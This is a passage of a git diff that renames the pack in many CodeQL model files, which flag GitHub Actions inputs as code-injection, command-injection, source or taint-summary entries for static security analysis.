["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index afd7aabc1fc..1d8b8f0e9f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index 49e556f585f..4eaa610a3a2 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index 24585aa50ed..a62139e12c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index afc7af28f9b..2f3f85fe424 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 5b3d91a8a7b..f39a027eda7 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index b43253eb619..5a0b692e4e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index 89559cf57e3..ae902cb95ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 6292841e56a..78379dd7796 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 9f98fd51139..0eeed9a1f17 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index e04605511b8..3ab501e1b1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index a77181e6c4e..caa0ee6d7cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6c90e29a43b..b660b0bc4ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 6bacbc181da..0fe5470bb11 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index 83d438d4e3d..a9cd5759cf2 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 703a766cb4c..5b0dc5da53d 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index ecb4c809efe..c90d1ac8afb 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index 9b02577be7d..8d68efb9247 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index 1ffc3df1c81..cb127c7ff46 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 53ed1840b0a..79936a51520 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 17d2ed2e473..9bc26169b27 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 68c2552c350..8aa19f94452 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 977f6b98ae4..dc86b19a69b 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 616f7fdb9ca..bc9f2aad14c 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index e4961ae5ed6..c3604795c25 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 19cce83c691..dfcc204c2ba 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index f838eeed0eb..c8d5e822c02 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 48e5b05128f..5c7ec5f957f 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 448997b3136..5384571801c 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index 13af446f37d..ba5de742701 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 39e1c9ef624..ce0fb573493 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index a442ed5cd53..8f53dfeb118 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index a22fce01c45..6d7d368c781 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 74a5c7d592c..9b0f078d874 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index e78dfb3b073..dabec4e8d21 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 29dac5cffea..2db040a0709 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index f2331633485..e8d4aa790a6 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index e492f601278..8fde3e0c110 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index a821b049232..e9b04f2806f 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 4f9f887caf1..386baaf2f95 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 365f3ac98f8..d9c7d33c86f 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index f42e8465533..016a8ebc8cf 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index e21b5224166..d358aa23893 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index 6c4a5931b98..f37bcbd6297 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index c7e89697afb..05acda9aac9 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index aa849603836..4b0c810d230 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ae869b6b531..acdf3ead4a4 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index 9f5801b79c0..b138d59c57e 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index a4a473b8efd..63b236f32ad 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 10a03e4d186..0c6debc5d5e 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index 9af82b985f3..b72bd69e625 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index 3b779d0b86d..fec2376377e 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 6ad087730e4..3201ac370b4 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index fa9c1958352..59c6e39515e 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index 6bfaffb2bba..06371eebae2 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index 03fa8beaf0b..a12a478d9bd 100644 --- 